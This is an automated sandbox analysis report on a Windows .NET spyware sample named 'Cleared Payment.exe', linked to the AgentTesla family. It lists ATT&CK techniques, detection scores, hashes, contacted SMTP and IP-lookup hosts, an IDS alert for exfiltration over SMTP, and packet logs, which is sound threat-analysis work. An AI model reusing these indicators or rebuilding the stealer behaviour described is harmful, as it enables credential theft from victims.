                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS111
                      Security Software Discovery                      		Distributed Component Object Model1
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Cleared Payment.exe74%ReversingLabsWin32.Spyware.Negasteal
                      Cleared Payment.exe62%VirustotalBrowse
                      Cleared Payment.exe100%AviraTR/AD.GenSteal.haobg

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      smtp.italiacanda-it.com4%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://smtp.italiacanda-it.com4%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      		208.91.199.223
                      		truefalse
                        		high
                        api.ipify.org
                        		104.26.13.205
                        		truefalse
                          		high
                          smtp.italiacanda-it.com
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgCleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://account.dyn.com/Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://smtp.italiacanda-it.comCleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://api.ipify.org/tCleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://us2.smtp.mailhostbox.comCleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.91.199.223
                                      		us2.smtp.mailhostbox.comUnited States
                                      		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                      104.26.13.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1427197
                                      Start date and time:2024-04-17 08:35:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 46s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Cleared Payment.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 84
                                      • Number of non-executed functions: 5
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      08:35:54API Interceptor20x Sleep call for process: Cleared Payment.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      208.91.199.223ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                        Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                          MT103 .exeGet hashmaliciousAgentTeslaBrowse
                                            New Order 0048757.exeGet hashmaliciousAgentTeslaBrowse
                                              SecuriteInfo.com.Win32.TrojanX-gen.19751.7678.exeGet hashmaliciousAgentTeslaBrowse
                                                Po094847 Urgent .exeGet hashmaliciousAgentTeslaBrowse
                                                  PO_10042024.exeGet hashmaliciousAgentTeslaBrowse
                                                    cgprgRztWc.exeGet hashmaliciousAgentTeslaBrowse
                                                      6P8VytD7wo.exeGet hashmaliciousAgentTeslaBrowse
                                                        FedEx Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                          104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                          • api.ipify.org/
                                                          Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                          • api.ipify.org/?format=json
                                                          ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                          • api.ipify.org/?format=json
                                                          Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/?format=json
                                                          E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/
                                                          E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/
                                                          SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                          • api.ipify.org/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          us2.smtp.mailhostbox.comQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.225
                                                          Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.225
                                                          Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.198.143
                                                          MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.225
                                                          ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.223
                                                          ES502900012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.224
                                                          April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.198.143
                                                          TT Invoice copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 208.91.198.143
                                                          MT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 208.91.198.143
                                                          SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.224
                                                          api.ipify.orgSAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          45brrQrxwH.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          remittance payment of invoice DMWW24009.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          NOA, BL and invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          https://worker-royal-sun-1090.nipocas604.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                          • 172.67.74.152
                                                          z158xIuvhauCQiddTe.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          z34PDnVzyEItkXaInw.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSSAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          http://139.144.214.53/5nXpDw325kdXA19thlgqqvurf31CSRUYYRTWNTDQNU30935IYSS28p9Get hashmaliciousPhisherBrowse
                                                          • 104.21.54.167
                                                          https://theredhendc.comGet hashmaliciousUnknownBrowse
                                                          • 104.18.11.207
                                                          Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          hcjt7Ajt5t.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.217.241
                                                          45brrQrxwH.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          3otr19d5Oq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 104.21.77.31
                                                          msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          http://bookstopbuzz.comGet hashmaliciousUnknownBrowse
                                                          • 23.227.38.65
                                                          PUBLIC-DOMAIN-REGISTRYUSQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.225
                                                          Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.225
                                                          SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 162.222.226.100
                                                          Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.198.143
                                                          SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 162.222.226.100
                                                          MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.224
                                                          ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.223
                                                          ES502900012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.199.224
                                                          April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.91.198.143
                                                          TT Invoice copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 208.91.198.143

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eCredit_Details21367163050417024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          SAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          45brrQrxwH.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          remittance payment of invoice DMWW24009.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                          • 104.26.13.205
                                                          NOA, BL and invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Hays_compiled_documents.ZIP.jsGet hashmaliciousUnknownBrowse
                                                          • 104.26.13.205
                                                          MdeeRbWvqe.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                          • 104.26.13.205

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cleared Payment.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Cleared Payment.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.938263954989257
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:Cleared Payment.exe
                                                          File size:767'488 bytes
                                                          MD5:0df9817e2867f94e6bf0c066f9d88013
                                                          SHA1:9b45f5c8cf5402b8cd56b58df316ca84b633f5c2
                                                          SHA256:ff70339ef950407a12f181c63d5b3d59fe40198237d97ce3c6537403c7863624
                                                          SHA512:f14ad10b0378351739effc439c3967f0bf41ccca9a45f3ad438582a03a806bd44945b858c68ad35283d39787be4bc078ed5939005f38af9dec0b32dd3ab9806e
                                                          SSDEEP:12288:qJiNBSErx60+7FKlMglO7kMSd1CjKaXJt9Fh5bvo8nkLtU45M1z:+iNwErJuoMSOGk750FtHO
                                                          TLSH:03F42340316A9F33CA7F07F9683C25F00B766569F671EB8D5CC950EA15A8F810762E8B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.................. ... ....@.. ....................... ............`................................

                                                          File Icon

                                                          Icon Hash:8b2f2f93b3a38178

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4b099e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x661C9380 [Mon Apr 15 02:40:00 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          inc edi
                                                          aaa
                                                          cmp byte ptr [edi], dh
                                                          inc edi
                                                          pop edx
                                                          dec edx
                                                          xor eax, 31554837h
                                                          push ecx
                                                          inc edx
                                                          xor byte ptr [eax], bh
                                                          inc ebp
                                                          xor eax, 004A5135h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb094c0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000xc61c.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xae9bc0xaea003bd6d02d6ac7a451583a02f90b5ad40bFalse0.9491684189334287data7.942915720013936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xb20000xc61c0xc80026a6e0193406d4ede9d8b10ea00f780bFalse0.96587890625data7.903145479577397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xc00000xc0x2002a1229488b535f79469e9ff838e665f1False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xb21000xbfb9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9901998736782054
                                                          RT_GROUP_ICON0xbe0cc0x14data1.1
                                                          RT_VERSION0xbe0f00x32cdata0.44704433497536944
                                                          RT_MANIFEST0xbe42c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          04/17/24-08:35:59.697606TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49714587192.168.2.6208.91.199.223

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 17, 2024 08:35:56.703314066 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:56.703349113 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:56.703494072 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:56.710272074 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:56.710284948 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:56.935055017 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:56.935157061 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:56.939341068 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:56.939352036 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:56.940751076 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:56.983894110 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:57.010900021 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:57.056111097 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:57.229729891 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:57.229908943 CEST44349712104.26.13.205192.168.2.6
                                                          Apr 17, 2024 08:35:57.229970932 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:57.236388922 CEST49712443192.168.2.6104.26.13.205
                                                          Apr 17, 2024 08:35:58.210551023 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:58.364218950 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:58.364543915 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:58.706649065 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:58.706886053 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:58.860425949 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:58.860692024 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:58.865853071 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.022391081 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.027379036 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.186510086 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.188256979 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.344630003 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.345020056 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.539174080 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.541800022 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.541960001 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.695760965 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.696962118 CEST58749714208.91.199.223192.168.2.6
                                                          Apr 17, 2024 08:35:59.697606087 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.697606087 CEST49714587192.168.2.6208.91.199.223
                                                          Apr 17, 2024 08:35:59.697606087 CEST49714587192.168.2.6208.91.199.223
